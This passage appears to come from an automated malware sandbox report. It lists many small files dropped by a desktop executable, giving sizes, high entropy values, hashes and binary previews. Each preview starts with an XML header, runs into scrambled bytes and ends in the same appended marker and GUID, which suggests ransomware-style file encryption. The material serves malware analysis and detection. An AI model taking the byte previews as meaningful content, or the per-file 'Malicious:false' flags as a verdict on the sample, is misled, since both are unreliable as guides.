          Preview:<?xml....s$l..l....4.m.k.!..}...[.\.E..y|)VDc`b....X.....Z..^..b.$S>f_.e.-.'....S..P...+..o.G.....D....!.....Z74&`......b.5/....cnvn.|M5..G...gH%.qE.#..v...^.9.x...8.((4(..<:`?....f_N.....j{.<D..c..n...@]....P..l.).......8fs...{..fg..1.n..Mf..SW.............R..0u....L..(..*$...X.x...<....#..`...qgI..F`.~'(r..>.......p..^..V.u8:....8.....:........ ..R...G..Nz.Q...o.Su.K_e.~.u.....c.....F1..GV.............8.........."..RD...^.o..(d.y..t.S.DVS.....y.....f.*....-...d.m.e.KW.x..3.^....<_.....4`..$Y...b?.6/zT.^.Y`./Bz..HJS.,.9..y.l7D.)..M..Uk......w..B........A.....NJg..r..[.'#.l~......_d...]O..6.....^.U<.e.}.. @....!..r1x.Eh=Q...+...V:><*wI.V#.... :.....h..#.........l!..e....k).....O|AQ...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):853
          Entropy (8bit):7.708390322763025
          Encrypted:false
          SSDEEP:24:U2RcXFmOvAJ42NeumWv8I7V3d9LGFB07piTkbD:JcInnVNtGn07oiD
          MD5:D36096C657476ECD2723DBDCBC8A48DC
          SHA1:C1F6E29B75124A27B8A30F314BC17087E9273CE0
          SHA-256:13D2DC910BAB99B410C35D286D6A6D313C7FCB3B5910B13D52BE12B1E0688ABE
          SHA-512:840279B9E46D3A72A34E309BDC9F30ACE69867CB7CE10E43AF989EDA347B83228C8DEE43F7985987FAFD1F17E45B9B0F8E037D3DC5DBEFD7EC1DE5542A701024
          Malicious:false
          Preview:<?xml.f..@.&..kK<..3E.X.%.9..._R\..YZ./X1.#.^g_4V....z.j-t.g......&.....*$~ux.C!...H...F.@V..;`kPM......aC.....}.zV.r........L.$b...p.I..2,S.I.2b.S...A.0.y..a.9l?..9...).T(+....jD.......c...d..b....c.;g.mc3....+..d;...........$......}..e[$....b-...<E/.2.my..[...!&.....].O...C..p.Rf[....s6.>./.lt.uO...N!W..Ra.M.A.f.-va..$..;..O.|)^iW....L....,.LE.A...@ ......|.s4.d.@........<.l..x...4...u.7Kz..yc!..@.[9z;.8. ..)Yp..G...C.*.q..AF.1.;...b. &.-..XS.sKCi...2.0.:Y,.b......5..3F.....{V.....z.0..i.mCX0...O..,M..#......Jb4e.BE7.du...x..H2(._4'...S.i.........y@.?K.f.dJe...?....E.W...)e1...m.._..v...v%..(..:.s..Y.S<\{....oT..#."3.=>.'K.B.%.Yy.h....Jz..ZM.>@"qT.....&..In.(..C..t!....i.M.....D...4..-.4.q..GhC..W.I.P.>.,a..Ii6..7.<I!.......,.9r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):912
          Entropy (8bit):7.715339258853755
          Encrypted:false
          SSDEEP:24:xt8BoBv1TxlQh+CoVsqZSmMrg4HMvmit9wcMJiTkbD:xGMdTx6hqMmbsE9XMIiD
          MD5:2685994A6561475E026A9736D98623DD
          SHA1:BB467F361E9C4E4400B408E7DDFDB519CBCCB382
          SHA-256:C5F92C3DA25829ACD1C5C56956935B8741E3C96D38D6538AC20F49F5F9D95CAE
          SHA-512:6C7F1BD967C9A71A1AD2F1951E502E61E54CBEA0780D09261AF4B9BCB3E7CE1D6983288E6720A53FAC556442C06873FD79DF7732A17961672E27BCDFE9B57BAF
          Malicious:false
          Preview:<?xmlt..#.....M....CW.Iv...._..W..:.....r.uA...X.Q....<$..Pt...9...a.=.4.u@..............._.Bx~.oG......*.=V..i...$......LXT...R&.^M.\..,_.!.Wk.J:....R.5o.#*...8.......@oV........{......c.Rx...TY.t.aNC.K.#.=..b.6..G.......RXq.)D.7...+._...#...c3.5.9....s.&K..&..<..(e..O.....qML....<.:.N(n...Z..b.I...6.+*,..S.......Xc.jw..p.d..f.ZM.Ph..z..|....H\N7.....x...tPd.m.f|.|.....3+....].g..MT.J.....P;m..e.O?.3...3..R.i..mL.o.z...22....C.u.I.6k.M..7..*....`.=.o....+..............$.h...H\B..\T..|[......z.I^e.V..c.`RP#\.F,..h#.....&x..<?3.O.V@..'.]#|..| b.&N..e..+..8..P..~..n....2Vk$.+Al....,....bJ..&Q...*2..Y ..w..uh.uZj).].*,i..R.=le..hH.h.}......7....B.F.....GX.Y.|._d..6.P.t..f..~Q<D.....1......7..#..5{@Y...k.....IJ6.e+0....hc..\....j...t...P}....=.mN..Rf|..f.52.ny.I.H^0.5..P2...h..._w-..j...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3310
          Entropy (8bit):7.935072597818374
          Encrypted:false
          SSDEEP:48:f3qY1UYjvjt8bf0NptE/WgF12aKJdrswgGQniGOijziKQ6cwyOAegyBf+Ql2YOFu:NCYjry1CP95QnHGT6BZff+QhyBLqN
          MD5:D299D3B680EE3532D447B635CA8E9059
          SHA1:84071D81F293091C0C7B57F74C01C7196F02298B
          SHA-256:906A6895245B7887F03BCF173A333A5BFD3EBB671BCAD2E89EBD54D81B3F90BD
          SHA-512:BFC1BD7D2F57D672EDF6BC35E51D78CF33BEB2B4163296F94FFF88B02BADD727D50666163C6CEEEAAEA0AE7F78BF6335DFB20448100183DCFC7BBB212560B8E1
          Malicious:false
          Preview:<?xml.D./..{..e.....!...8vMw..}....ra....vc.8..<.p...8..{.,...L.Q.......v3.n..I.....d.)./J.K..^...Go.i.W..}.........c...........c^Bu.B.p../...c.;...2Q.#`ZT..z.!D..w..k.|.G.r.\.hR..v.G{"..9?.."...'.M.k.....Aq......._.....\.t..._.-H..ST37..yk.3...^.s9[."<...v.........n.i..H..T...A...5........].S..4...~...%...".8=..Cd..j.8....KAr'.^.2..,P...."..zpdD..m..\.B6.e.t...../2.s.......9(.09>..T...[V.2vl.A..B.......b/B...'..K.....o/(.YT.b..le.7k].....h.......n/(....\V.......<x....jo.....c1|.:...7^...C..:|7...~.D>......^{.f.a.G.u.+r.+..5~..Z..c.[-._.......M.#.@.,_$!%_e.>._5....^.....w6.:...YH.V.k..)C].-..,YF.c..+..S.O....Z.+.L1...H..E,r,.u..E.|H...%+.{9....`&b=.k......6V....Ny.....q./.........+.y.....'j...jE.'...!,4o.....>:%u...:...\.......WT......&C....3k3.m..I6..@..'B....vw.......G.v.L....7.....;.fu.,!.)...i..2+....p.y....|o![..H-.A..i....@....G../...7S."....r..r+bY...i....0..K...5....$.q.Z*.6'Z...D..s.Vrn...B.....Q..W*.[.tHl.sWP.a..oc#.....9.#..h..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):910
          Entropy (8bit):7.755592803364772
          Encrypted:false
          SSDEEP:12:09vOwkAxZlFckbGJspH8jHA31GUgpebhsV24cv8An2aLJPa02b/kWgGHlsx5W5E1:apk83VnXg0bhs8XbvJy0ERgGWiCiTkbD
          MD5:58305F75B4E48FB03DACBB2234F00A8F
          SHA1:0DF57537DF5F34A58E42345E6CC2CA28BFCA1CBE
          SHA-256:BEFE878BE7CE3C02C9389475776949862E3F4167DF41D6CA9981A78CF75FF936
          SHA-512:FE71456315568AA6915A6F90CEAC82964EAD80C3F719D3B9ED1A22690BBED6B3E646CE2E9B9173CFAFD2AE804F06DD3B3604848C7DA2527E31B7EB839CC8CCA9
          Malicious:false
          Preview:<?xml....~FQ.....&X..zr...../.M$j..}ApZ<.....qF.=.].....N....u.%m...n...^.F..TV.........*s.v....7.0.7.../xH5...O......Q...Q....._.f..?.U.1.5w,.........S.?.....U...0..Z..>....T~........%0;.K.....W.*.]..&...=...ktS..!E.....7.......O..T..o......;*.u.t...A.O.6z}.1..b...S.0...s.6..`6r1.t..m...P0...N.....X..W......4.. ..y...Y...VHeo."Tl.1*._[.......'..H..U.....,.K&.F....L...\..I]Vdo.......}.5.e........}..h.SW.0.lt.....,.E.y.Ti.d...,....A._...W....k.0.I4dh6*h.X....).u...x..U.p........*!....=.VQo1*....Q.h .89f.........TM.<.....05...[.9..EX..1<.......<...CC.`...."1..Q.L(g.rf...D...y..byE.e.tW.+.&#[..E.!or.~.i.ka........Z..@....\....h.d.I/..f*......6mA..~.....a.....M....W.m.@^.F..E..}..~.......8 [.."..I.VB_;...^.............-I..G.G..|......z.V...tH.:.J.U..........#~.a.JKX....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):941
          Entropy (8bit):7.782545162773547
          Encrypted:false
          SSDEEP:24:mz0CSr+evQAo5MknGyXFjzPOf6qcvZt3/aQK6iTkbD:ql4QZ5PGkFPsdc+QCiD
          MD5:3ECF1202ADF9322E5015D9941217EA39
          SHA1:C50605634205E1BD7125CD69F0456C89BC52E757
          SHA-256:F75DDB03692BF0323574FE76568768E4228913EA7DEAFE2699F64499610CD34F
          SHA-512:0AB094385369B7A941FB947237C9F9046AB55F89A6F754FD54A48FFC14B350C4CE2B1BC334AE27365C7DC37F924837B05E26799AAB5010222C4F1C2852BFD3B5
          Malicious:false
          Preview:<?xml.)g.....=d....~P...v.T....M..9"q@S....u.x.+d>.... 7"^....U....O].Y/-..d..i.8h....,.T.WK?_...|.$..q..Emo?Bx...@W.....=.8.h1_.*.$.....d.....T..F..;.[..i...<.x.&x.h.w..!....y.DI..<.7.....S....o.`.h;.5e.P.......Q.yI8.ra_..H...D...H.g.k..........5.jOc...jX..m...p.:5G.d...UM..L!..(jv.[..._]r.vWp./...].p.......j.m.S..W>...*.@..*K..HP.4......F?.....b......L....cZ.Ib...e5...?.gb.,.7.|..<;....(]W,"Qm...../....\F......yr$}gE.........)..lXX,..o..F..\V..w:i..JT 7.g....:W..u.k ~.%.....J.?Z....{..%?V6.W.)..f..%+.P....UfB..d...b....y.{.U...Z.........e...Y.3.d'.>P.!7\.(.....ot.c...iZ..\.c....E $.\..7Fa..=.[..>L..:...'...g......t..+Q.s...$-....4+.n.`.s.L.l6B..,....LN..q....,+#....lu.H?1..K....s..7?..Z.....x.qY..%5m..?m.e..Zp....+..+m.Z/<.e..d.q..kP...85...-._.e.*.x..F: x..Z.0.|..:.........1..*...?...o.5)K..#..s/.f..M.-&.gb.Z..9.+.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):787
          Entropy (8bit):7.716135701785493
          Encrypted:false
          SSDEEP:24:HxR/PUNW8aB9WCEpYmFxvgcMfydwIeiTkbD:zPUN07oY6vgcM6PbiD
          MD5:16600F455DD6569C9A227D231446BE5B
          SHA1:F27581AF85C7E02F7A63F9F64EDD4E836466A983
          SHA-256:705E7F78784910802B73ECD86F67A328D4335649365C5855CBB1681FB4E48915
          SHA-512:7A850E4F46682EEE522142AEE6D14E9C91C0A7C2125D2E1A829406BB5A4C68FA60D52E19944D70EFCB8C4314460008F0BD57B80916FC1E7A5E022A4454344DAC
          Malicious:false
          Preview:<?xml\i...t.,.`x...y.......b.... %...YF..(..*..@.5.J...M...|.)....6............0..ce...|...S3H/..D.qp.+cJ....J....3j.b.x...|:..z......%..!.........&R:..m...6.by._N.Q.bA......?C.*....h3!..b..=4...i++..N...v....L.w...;k..~..*.h..q41..*..Q......b.F....3.4....H.}.0MXy...t...Kk.J..>.I..Y.wf...i...t/.N.*....7.X(.e^q=..(....wN(..7[..V#NG,!..|.>ZIQh...5.~.HIL.x..X..|../ ..X......2..... /....a...........}.......P..r..Y.'....I..g..%\...?..f:.R*.rn...UuT.3...@@[g.....R.l..T........,.`...kW/.Z.W..(.U..{.q7B.....==.S }....{#."H..6.R...... ..X.......9.........Q.....e..4a.EmMf..-.tEm.........5.....t..5..V.p..$.k^..#.^..2....%.y.:.._AN.r*....}>{.8..J.H3.U.....e.C.j.v..M.%.5)lW...y....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):961
          Entropy (8bit):7.795412366622312
          Encrypted:false
          SSDEEP:24:ayrbbWpXgolx5LL7DbDmezQPHipdyTLuTjiTkbD:aObipQmfXaVPCp2PiD
          MD5:AAE217DFFBCC899AAC6FD65EA0FA9DCB
          SHA1:007EEE117951E9451E4EB7C1D644D7A087FA8844
          SHA-256:4790A1445A3C9EDFF72A3ED864AA56591B257C5CEBD759D1180C26F95ED31ABC
          SHA-512:0AD8CBBFAB3925C1888CBD9600F18A8DE27B608FAF1C4643C0745F53C1D9481DDD1BEE03774111C32732EF0C10CE62CC94801D5C1D853A8B52B80D6084A828A3
          Malicious:false
          Preview:<?xml.t...Y,..^.9Z..vV.6.=R..y.{ex.P......ly.4n.b.~7]....8.Rl.bp.........K-.?,......,..9.$...X.t-...../.s0..5..../,N..8>.^.w.g.+..g.]-..M..81N.Ex.....Y]S.0c}...s.......k.~..R..XMV@.`E............x..".>p.1u.#.D..5'....k..VLe."..2.".dn..2..m.Yt@U..........*H...=S.q6*.H.}........%Y....H.#.hOj..p."..$>.\.&9....(I]....7..a*..U.%A.t...wg.#'.B.qb-h\t...N..W..%#.I.5_.......#..A...a...X.0U'...I.:.?..|....yK.....b.....v(Z.92.....@'CC..1m...x.z.L..A.o...VG......r-x9.`<......dNG._.~..i9.M..A.c.....D........j1...b..N........f||....n....<..]...._.R......B.l.....Q.......CR7..4...,[...O.....Ia...%..!...........}ZG..T.0Rsn........S....?.d0...g&..I....h.....Ma....62.IHP3...P......9..{......p..u....t..d=...3.W.......;..[.e...=..1...J.....Z:(.|}.0.2W..Y...E)d.....Y..F.%...".V..]...:..jHwS...q{?~].....l.t@.7_.UT(..3ETd.....6.`q@/1......r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1131
          Entropy (8bit):7.807142420506996
          Encrypted:false
          SSDEEP:24:CMCDeNUcyQTnYwAslBgQwM+WWEQOU2yWfzlVvQkBNl4khoiTkbD:LN1yQT7lBgh/WWEuVWfzP3H4kPiD
          MD5:8FA52822345F37818A77FB5DBB27143B
          SHA1:6309CB949745AFECF8FD2CF2470030C62F613D80
          SHA-256:1D3B8495040758F217F644724BAF700FA186C7D934707DA95C8B7AE46B992272
          SHA-512:8034B52CDCB3E656140907B00F008F4F1830CC666C281D9B4B46230F43F79E9B10818E99F8404A5B0265C2684F28242E3BF3A7608BC54038D704BFAA402F9190
          Malicious:false
          Preview:<?xml4.o..&.....>d..0B..@..p)X.........';.Q]j~8.).....6j$...O(%uQ.1..Y.I...P.h.H.A....XzT......rw...:../Rvp...:D):.A...2=j.:....yN..`..2..N...-..up..j.(j.>M..`O....bK.8.....yX>.$...2S........_...d...|.1s..?.@.!m...q..LY.....w.......Z......x&...D..D.B...b.`s}..}6Yny/...V..9.5.!F[x.... ..e.Z{.3.b......:-B6: -'s.s.b......p4..&'.\F.. ..........k."..2.....s@........G.....?.D{:x........Va....a..o..H..i?...e.....x..nD...L..\....2.\..;[q..z7./...,..f.J?..".s..^...5|..`...b.#..N.V.C..?...q.&..O....,.;s.H....##...h......;.....g..:..w.o.s.9e....R...@...PEF.YY.(W0..E.{f.uL....S..q.9.i...}...a4[l..........NU..`..v......r!.NRk...7vx*0../....n...HV.0|.E.Jg.".....k...5|.5.T....m.`..B.9..R3-.(. F~q....U.B..m.$..[...PdK.'R..).g..........u..$.WPP....-...z...+.9.!.t...w.^.T7....t...Y.&1.*....R!..UyYL..u..*.P...{.;P-./...".......d.O..N.....m....xyD..........wA......*{.:....B...V..dc.e.z....<{O.....7.........q. .....?.1B.s.N...._<v...s...o....I...=WB.z....|J...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):987
          Entropy (8bit):7.78308662869357
          Encrypted:false
          SSDEEP:24:4zu/xtc4/4MdsvOQSlXxcVkQs7Cig3udrs05AWiTkbD:f/xtLamQSFxcneCiDdFGTiD
          MD5:C7C2E69A9D53CA3440972BF5F1C66731
          SHA1:D0749E884381C70FDB5E3B6C8DD0F04E11949DEA
          SHA-256:BFC791D38D1689C7C38E8991828F8CE80F68052414600AB5C3D8627D7415EB0C
          SHA-512:0B28D1FE9FAA55596E9684978D3EA0910ABCEF0B306B744F4AEDADEC206CFA94EDD7508F90838CA524E6B175B71A7384CD1C7B66DF93E4706D4178237BC3C7EF
          Malicious:false
          Preview:<?xmlE...&s`VA..<......w.%u%B]........U...[h.....$....O....T...(LMM..O."......D..V.........u..Y..p....B....W...*Y..Y.....[}I....7...%....4..f.\.!0.S.!+.....V...wjR....-..R..7,........S6.k J.z..1.|.[.+..I..V.2.-..pt.R../.'+n}...._$..........?5r./..o.X.iK...C...}...$.......U.w.....V^dnQKT.. ..rTa;...uL..x*...N R....rc......g.$....K@.......A....._......9......?5n..Q......g.r.......>x.3.....w...={.j23sr9i....v...yr.q.......e>.7.A./uD.^....P/.3.b'...:.y,..OTQ.RY..X!..+..Y.+.....I.Xns.v..aP.".[...5f.+.... .k.n.EEv.:J.d..f$f.-*..@.....i.w...S..B..cw....^*:....2}.J/...~.......k..;..i...V$.=.`..&9..0...t....7~.G..d^..O.v...}.|....1....C.<..E.;.# ..u..k.X...z.3........,..k.........mP.0....U.u..[J.....V....pe}.=H.:..3R................x...A.6B....23.IQ./.......1\.>.x.!.jD..qM.6.esG..fI.G..w...S....ez>...?C2..<..%....+.S0S.....n..Cp...W.......Y..$bCA.O.ch?L.Er6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):857
          Entropy (8bit):7.745181653892647
          Encrypted:false
          SSDEEP:24:qnjeyW8sqNp0qk7Gjw8L0qpa/Nsz5aiiKMS5ijDiTkbD:qnjeyW8sKpc0wz/N65aihMS5PiD
          MD5:E779A739C177570457C8BEC641D0C537
          SHA1:74424BD05C3F790FCF356617EA61415320FDC076
          SHA-256:369519BC7B5C4F51A37B3CC745C43C30DA8D9F63AFEEA3DD20B51A0A1F975847
          SHA-512:C85F671062B06004941125AE3006C4A9227933DB0F57546989EF494289B7848BF8C7E84971F07DBDE281B084B438D8EE4134F4988D31EAB6DBEB94AFBD75DFE0
          Malicious:false
          Preview:<?xml.."-..K0.b.J..Hk0x.d...7.m.6...z\p.ba....Q.......z.]0|@..>..r.C.?..m..'7.eXj)........Z_.x......v.9.r.;h.<....G]...md7.+J.N..W...$...=R....v.[3.T...7OUU..P.t.f..6d.....9[....w.wr;..U.....a..`.vO4..oq...c...v.m....R..78...`g1*.H2tGp@.fs.>.->}....AP......E..#c.C..g.w...@..I!j...sz>..y....m.do.....}...c.....\....E......h...n.............>h..1%....Z....8xLg..6.V.}...+\.#....oV..Wx..`Q0y....I\.\.TZ.I...).......D.{q...Y.....Du........).~R....-....ku..}.?V.H..L@H.Hv?.t...J@C.........a.p....)^..|........T....t.#.6......e?..Y...H.X..Sz...X.../...=r..o....../..U..rP...}....M..I......s.M};..TU..34......P.&.BofbWg..Nc..P..FxR.6Rp..Zs..O.EO+.T....iK.F...9.3..r..Y.%.s.\.].A.p..|Ar..5..1..Dg-r..Zc>.. ..y:s*VM...?r....V.^..../..!...h..8.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):859
          Entropy (8bit):7.700132782695368
          Encrypted:false
          SSDEEP:24:TFqs+xqujk3Dm8P+BXoSxyNEVxQDZxPiTkbD:TF8gj3C8P+YSxyCVAzKiD
          MD5:BF8B138B48C478C0DF66A6A28463AB00
          SHA1:0091932230259661477D4984C0ADE496D80F7B71
          SHA-256:BAAF9988FEA904E485E06E005FAD9EA954F5A712ADA7AEE273B8B420BC9CD962
          SHA-512:69FBCE403B512E4024C20299A004AEA1B3B9413A3BFA6B8A76747F556C45B72CBCCB973A130E1DC8E555144F93054D32348BB1B761C41D0DFD2CCF6A7B0F8B2D
          Malicious:false
          Preview:<?xmlP..1..1...rBD|!.'k..8......J......X...:;...-_d^H..caZzUb`3g..C..T6f..M[`...........!.."..,...._..mC. c2Xh....JK.L.D.4...#...M.DK..1.k...l$.{...V)...zO.Q.~.N......;;.h..".Q..\.W.2..I....t..B..v..0....ve..A..6.TP!..t...E.x..*.D...KW5....w<...)~0...QT......g"5A.:'u....z._*2.$/TO... .v>....[.../y....F...sr..z.M.bC...y.s...$...&...[.....,vI.....A.fi...z v+s.J.....O)z.BhXN.u..l)d.....!....C..?..$....$r.{./@=?...o5..k}L.w n.....4B..=.]...}....rW....).d>7.:.i.41w..|C..;:r...4.=.Y...8.....3.@7.[..p!.K..^....A....!....t..@P..O.........i..S..e....T...6......m..I.~.?......|....5r.I.3617..|C...?Q..O.>.G.kc*AN.2.x....";+..i.P.M.].....c...E.T..M....|.?..P....5u....n+.. Ys.O.M..M..=6vI6...jC....J.TeA.l....B.D..pzm..J4...t7.K?.J...U.J....8....a..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):725
          Entropy (8bit):7.684288117968908
          Encrypted:false
          SSDEEP:12:idhSC9P85MyFwDy4tjTw2eQfVzyAxJjhSvG1hp8JlPEQzcyMQImixpZacii9a:i7E/CDZ9ZzV/Sk8bcGImiTkbD
          MD5:5823BA310B98B8A618A2F36EFA5B02B5
          SHA1:93135B939365B79A84D927B866AC38214957FEED
          SHA-256:4EE4947D41348E9BDBEC088A67F6365AA44C81868FAED285181FF4E640D33C60
          SHA-512:5D64E130B2999C059361A1361ABFC52600CAEAA0FE052CAE920AEEADDEB86691CB03D064B15E2E348D7CDC9E2BDD00F2F08935BB20DD95E7C4A6C0AF5B9CB46C
          Malicious:false
          Preview:<?xml..c.?1..7.|...;.P..JP.0tH.."..&..@lD..0).!..w........"......Q.....e..h.^.t.Z..=..p.Y...B5.b.....=..U.KV.b..s.`....fu...a..g.]..JT.....q.z...Y.R.y....u.......A........OJ:`.....5..%..!..t..........{n.=.....;L.>....e!.A9eQ...=..7.....'.....g........p....!'R.Gl....X..<M./......m..,%..v"..{..`...$2..W..].]....q2....zx..k...R.eh,.?S.....(.o3.&...Y....iuQK]...N.........0.....GHj5._a.7.J..Y..v4...../...s,....w.yUWF.....Cv[..J...x__.c~>.M..l...yH/{....uJ.....u....SzVy.k.v...c....fi..C(.l....b...n......*\.U....xGU.(.0.yN....72...^.b..E6...PS..!..<.4.....,..72._.x.........>.\.N..>.jV.u.#...C.,..Z......B^*F.Jr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1175
          Entropy (8bit):7.823716905730162
          Encrypted:false
          SSDEEP:24:cHqcN99iXX1SvdRChBKJf0hgS2BJW5ZBgUHiAj/VHFQFN5HmdmosA174x+iTkbD:cHzPUXX1Sv+wJf0hgB45zgmX/zQFPHmB
          MD5:472A0ADD8291023777566F96574F51CF
          SHA1:F115899F1854B16049D4CB8725E3D4686A5DCA13
          SHA-256:4041D08EAC3BCA7F457DB428115154482D757F1E9FD2272B0516D36B0CB9B82E
          SHA-512:977AF7A1C623EE4D5FDB43215D3DE2BC95B82E9C763902FD3748D78CA8039F6AFD32C2A8A451E0C45212979C1B4FCB19E527E1BD684CCB98951F069BB1BDA913
          Malicious:false
          Preview:<?xml.8.,....f.Z.#.t.2x.U..j&....b...M....NMv>H.OU.V.2...T.r..Y.T...fq...&I.=.......z...U.u%Q..!G...LO.......4.QQ.p.V.i....H....s.az|Z..,........`...<./...8.F\.;TICi0..8..P.T.&g..}.....?..H.O"z.R3.<s...mnD.B..Hu..TGk.=@ .6.......Y...u.b..~!/.(.....j.."$...........PTr..m...e..... 9.{....O.VF.....0..!7"X.%l..G.E.2...c...~$.Gn\f"...H..u.H...w^....f...F.c.l..'.Va....5.....G.O.#.c*.M.....kS.I..E...Q...o.O.(.*../.f............Q.`..9c..v.[.P.d...>z...7hTZ.$%.(...D....#./o..+..(...Y..""g..a..u]).=...8....a.$$..t3"*.n!....9.s.G.mYtP;.D.#;....guV...$..y=K.....Q..(.q.!s.......J.K.iZ..W.....tm.......z.JG.v.Y...~..../...Pj.ZMC=<.J..I?_5I...R.O....O...j...R..*S.t...%44....(.&!.m.d|....J.=.....-.!..I.*.. ..u.{..%.... ....|:......bU....d%.......]..../.-4..b..s.C..:..`........S....?...P.N..Z......%.t....I.C.!ai.<.....Q.>...,.O...)..4.N00f...#...(..d.o.eW....S.vO..H.L......=..]..Ou...3..[a.J(.UF.c.....\.".p.kBC.:.t...0.u...{|3..*.@.....vkp.Y.Y.<..?....SQ.61..3w
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):724
          Entropy (8bit):7.668232114111862
          Encrypted:false
          SSDEEP:12:apKrWplXZ+q/xfDzX3uzOgZjnd4ohOkPJDxFCSWY6stCAjrDO0TSqXUXKixpZacq:a/lvVDIndnhOkhDjCxY6s8AHDO0TVXF1
          MD5:1C83DA9F8D6CD8DF21FA9A59D4FF67A5
          SHA1:BB7A2230598B110DCFEB904221007BF3157C979B
          SHA-256:3C6A18AF1CA4FC179B5B6C012DB9FDFA4F3EB9507CD5CB7C3972F02BCB6B9712
          SHA-512:D29465FD4EC0556F499983832F9838323F353D770D29EB8EE2A1DA37025592DD923A301D50A0FECE261BAD25F05B46753758F59AB02787136751E724B2E13EE8
          Malicious:false
          Preview:<?xml.....l.qe}...J}.A..e.]z...2@.3.5.E\X.9Ou....Bha.GV....c.....#B....qR..[IG{#.....l.|Y.~6A!%..........j.A.`Q..ny.C1.......g..t.C.8.]4.|.G.J..'Un...'5....j.3...tt.s...H.....Q?([a..gS.$R....;.....<..+Z......O./[.....'.-{]]%&....I..D....At..)X..#..A..b.Zv../..(..=.m.c.}....T.9..5.x........z....`.C.a[E~o.m.5.l.e.......0..|...471U.)l~2k./.E.....W.u..\\...A..0Y_.k....'...#..Ttb[...$.....).L5:..`....h.......a.u..1F..G.O..h.N.C.,...5...........j.S..Ia.....~4ITU..U...@......a..;.).........H...=...sx..b..K...B.&.z...O..A.....I9*m......<...q..Pl....(..;.....Z.Y.B."..I..Qw...H....y_]d.78H..U..I.7./..!...\..9t..V...xJ....Sr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):746
          Entropy (8bit):7.727956856981108
          Encrypted:false
          SSDEEP:12:7/lrkVWAWe+5ieNZnlfIoooOpA3ldola9EsjmaBgOAwFDhkObH5QixpZacii9a:DlrZAWe+5XZnh1OpoWEqsjmaBgO9rfjK
          MD5:FC1AA7853EE7112B04A0D7108FDF85D2
          SHA1:77528B2633A8D31BA15E9A0566F529E8EFC9DE90
          SHA-256:7C316E1069ED14CC0996902ABD9CF7DD3CB0C1D7508360B89E9A81F440F43AD9
          SHA-512:114D90C04988F03A49D7671027C4C82B34B67CC7CF867DEF0BE017ED8C4C3F5E396938316719F42DA99EEBC068455B2800C59BAE2D2D6CCB6DAD69F19DA165B0
          Malicious:false
          Preview:<?xml..W..A..K5.Z.ce.]`'..d..s..L.....;n f..<(0...'.9.....L..1.5.o.Q..y.........MZ..O\.Z...X.v.vGq.*..S.K`D.z.1.1..d..K.....^(..SJhQ.=.8o...4..b|r.o.Q...XJ..,...G......{..9k=u...0./..A$Z...uC.o........;V.z....=..T...H........(z..W.V..0.1...I<.}...q.9PI........K..=._..I.<tMe...%..P./........%?)."Mn:../H...S...E.P.8..`u.Gn..e........~.K!..|.......<x....M/..S.v..K.u-...h.....\U(.q3...Zr..:...z~..y..c.n>r[.71KO.....<z.d~...].I6.)l..., ..N*..2.....A.r......;...Y.c......Q....z_g&.U..<K...r.s...|.N.?...X...$.*...\x!....Y..lw$.x6..U..p..P.L...2...@.k6....=..0-l...&.H<..j.~.,..e.s/.b>....{f{.I...aO...:4.W..tW8....Ar...R...;\.E..p....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):857
          Entropy (8bit):7.775763723081786
          Encrypted:false
          SSDEEP:12:lzUeNbx61rb+tuAYiFQEQT3B1oKjRLSldXkRKwn8UvH3cbIpw9T1P49cbUUixpZE:xUeNbw12kAYiFp+1hIIMbIQziTkbD
          MD5:BDA23D78796F64184471959012B73453
          SHA1:B4D180F6277B6E6470DF6CD2C849C679BE1AADEB
